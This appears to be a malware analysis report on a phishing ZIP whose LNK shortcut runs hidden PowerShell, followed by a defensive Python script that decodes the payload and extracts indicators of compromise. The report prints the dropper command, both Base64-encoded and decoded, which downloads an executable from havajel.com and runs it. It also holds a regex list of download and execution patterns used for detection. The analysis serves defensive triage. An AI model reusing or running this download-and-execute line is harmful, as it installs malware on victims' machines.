Malicious

Payment Swift copy.zip
ZIP Archive | MD5: d1f009e2fd65b43f2eb917a772fbb8d6 | Size: 2.54 KB | application/zip

Tags: Zip Archive, LNK, Malicious, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1202 (Indirect Command Execution), T1204.002 (User Execution: Malicious File), Execution: PowerShell in LNK, T1059.001 (Command and Scripting Interpreter: PowerShell), PowerShell, Batch Command, PowerShell Call, DeObfuscated

Characteristics
Hash values

MD5: d1f009e2fd65b43f2eb917a772fbb8d6
SHA1: bcdc298cdd7eba27cfad2f824860f94faadf9e24
SHA256: 329ae4035bda94f3994dfc78d2bd771647e05cde4fe091ed076cea12f5831b81
SHA384: 1f7f2fc25d5af3e7417aa70b4ebe7cd097e04ecfe85a4a131516c3e13cdd249727e268ee345e223cf6cb3e763b927f9e
SHA512: 158a273d4278dc03e4f48dd570ccc3cf462f03b0370d3f6d05445472f1c75b690d74291357efbab5c1e9bb8ac7c124b017c71c89c2902150853a10699e9c1c56
SSDeep: 48:9iywvVA1zu7+TuSS8kWZTaWnywvVA1zu7+TuSS8kWZTaWU:YZvVA1K7+TuSSETaeZvVA1K7+TuSSET8
TLSH: B351D7A0740F6D74ED8AA7BE6088E8A92C4560CC6E65FF18A0C1EE55695634807B835A
File Structure

Payment Swift copy.zip (Zip Archive): Malicious
  Tags: LNK, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated
  Details of Transaction.lnk (Archive Entry): Malicious
    Tags: LNK, LOLBin, LOLBin:powershell.exe, Execution: CMD in LNK, T1059.003, T1202: Indirect Command Execution, T1204.002, Execution: PowerShell in LNK, T1059.001, PowerShell, Batch Command, PowerShell Call, DeObfuscated
    LNK CommandLine: Malicious
      Tags: PowerShell, Batch Command, PowerShell Call, DeObfuscated, Contains Base64 Block, Base64 Block, Powershell: Hidden Execution
      [Deobfuscated PS]: Malicious (DeObfuscated, PowerShell, Contains Base64 Block, Base64 Block)
      [Base64-Block]: Base64 Block
      [PowerShell Command]: Malicious (PowerShell, DeObfuscated, Contains Base64 Block, Base64 Block)
      [Deobfuscated PS]: Malicious (DeObfuscated, PowerShell, Contains Base64 Block, Base64 Block)
      [Lnk Summary]: Malicious (PowerShell, Contains Base64 Block, Base64 Block, DeObfuscated)
      [PowerShell Command]: Malicious (PowerShell, Contains Base64 Block, Base64 Block)
      [Deobfuscated PS]: Malicious (DeObfuscated, PowerShell, Contains Base64 Block, Base64 Block)
      [Deobfuscated PS]: Malicious (DeObfuscated, PowerShell, Contains Base64 Block, Base64 Block)
Artefacts

LNK: Command Execution

powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile invoke-expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));

Deobfuscated PowerShell (the four [Deobfuscated PS] passes above produce only two distinct normalisations; the duplicates are omitted here)

-noninteractive -WindowStyle "Hidden" -NoProfile "invoke-expression" ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Invoke-Expression ([Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=")))

Both normalisations only drop the powershell.exe prefix and the [System.*] namespace qualifiers; the Base64 argument itself is left encoded. Decoded, it is a one-line downloader: it builds a path under $env:TEMP (file name '\Any Name.exe'), fetches an executable over plain HTTP from a URL under a wp-includes path on havajel.com using System.Net.WebClient.DownloadFile, and launches the downloaded file with start. The LOLBin is powershell.exe itself: -WindowStyle Hidden, -NonInteractive and -NoProfile keep the stage silent, and Invoke-Expression over a FromBase64String argument is what the "Contains Base64 Block" and "Powershell: Hidden Execution" tags flag.
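As an added example (not part of this report or of the analysis tool that produced it), the following Python triage helper unwraps the Base64 stage from the LNK command line recorded above, pulls the download URL and drop path out as IOCs, and checks for the switches and calls the report tags. It goes beyond this sample in one respect: it also decodes the -EncodedCommand / -enc wrapper (UTF-16LE), which this LNK does not use; ENC_SAMPLE is a constructed command line for that case. The command line constant is the page's own; the feature names, the verdict threshold and the labels are my own choices.

```python
"""Unwrap Base64-wrapped PowerShell launched from an LNK and extract IOCs.
Added example; not the report's or the analysis tool's own code."""
import base64
import re
from dataclasses import dataclass, field

# LNK command line exactly as recorded in the report above.
LNK_COMMANDLINE = (
    "powershell.exe -NonInteractive -WindowStyle Hidden -NoProfile "
    "invoke-expression([System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String('JHBhdGggPSAkZW52OlRFTVAgKyAnXEFueSBOYW1lLmV4ZSc7IChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9oYXZhamVsLmNvbS93cC1pbmNsdWRlcy9TaW1wbGVQaWUvc3JjL3dnMGtOOTcuZXhlJywgJHBhdGgpOyBzdGFydCAkcGF0aDs=')));"
)
# Constructed sample for the -EncodedCommand style wrapper (not from this report).
ENC_SAMPLE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    "Write-Host hi".encode("utf-16-le")).decode("ascii")

# FromBase64String('...') argument; the sample decodes it with UTF8.GetString.
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
# -EncodedCommand / -enc / -e <blob>: PowerShell treats the decoded bytes as UTF-16LE.
ENC_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# "$env:TEMP + '\Any Name.exe'" is reported as "$env:TEMP\Any Name.exe".
DROP_RE = re.compile(r"(\$env:\w+)\s*\+\s*'([^']+)'", re.I)

# Behaviours the report tags on this sample, matched over the raw command line
# plus every decoded stage.  Names are this example's own.
FEATURES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_stage": re.compile(r"FromBase64String|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "downloader": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I),
    "runs_dropped_file": re.compile(r"\b(?:start|start-process|saps)\s+\$\w+", re.I),
}


@dataclass
class LnkTriage:
    stages: list = field(default_factory=list)      # decoded PowerShell, outermost first
    urls: list = field(default_factory=list)
    drop_paths: list = field(default_factory=list)
    features: list = field(default_factory=list)


def unwrap_stages(cmdline):
    """Decode every Base64 stage and re-scan each decoded stage for nested wrappers."""
    stages, queue = [], [cmdline]
    while queue:
        text = queue.pop(0)
        found = [(m.group(1), "utf-8") for m in FROM_B64.finditer(text)]
        found += [(m.group(1), "utf-16-le") for m in ENC_CMD.finditer(text)]
        for blob, encoding in found:
            try:
                raw = base64.b64decode(blob, validate=True)
            except ValueError:
                continue  # regex false positive, not real Base64
            decoded = raw.decode(encoding, errors="replace")
            stages.append(decoded)
            queue.append(decoded)
    return stages


def triage_lnk_commandline(cmdline):
    """Unwrap stages, then collect URLs, drop paths and tagged behaviours."""
    t = LnkTriage(stages=unwrap_stages(cmdline))
    corpus = "\n".join([cmdline, *t.stages])
    t.urls = sorted(set(URL_RE.findall(corpus)))
    t.drop_paths = sorted(set(env + rel for env, rel in DROP_RE.findall(corpus)))
    t.features = [name for name, rx in FEATURES.items() if rx.search(corpus)]
    return t


def verdict(t, threshold=3):
    """Crude scoring: hidden window + encoded stage + downloader is rarely benign."""
    return "malicious" if len(t.features) >= threshold else "review"


if __name__ == "__main__":
    report = triage_lnk_commandline(LNK_COMMANDLINE)
    for i, stage in enumerate(report.stages, 1):
        print(f"stage {i}: {stage}")
    print("urls:", report.urls)
    print("drop paths:", report.drop_paths)
    print("features:", report.features, "->", verdict(report))
```

Run against the command line from this report, the single decoded stage is `$path = $env:TEMP + '\Any Name.exe'; (New-Object System.Net.WebClient).DownloadFile('http://havajel.com/wp-includes/SimplePie/src/wg0kN97.exe', $path); start $path;`, all seven behaviours fire, and the URL and `$env:TEMP\Any Name.exe` come out as the IOCs to block and hunt for. Decoding is done with the tool's own GetString semantics (UTF-8 for FromBase64String, UTF-16LE for -enc), which matters: running the wrong codec on an -enc blob yields NUL-riddled text that the regexes will not match.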
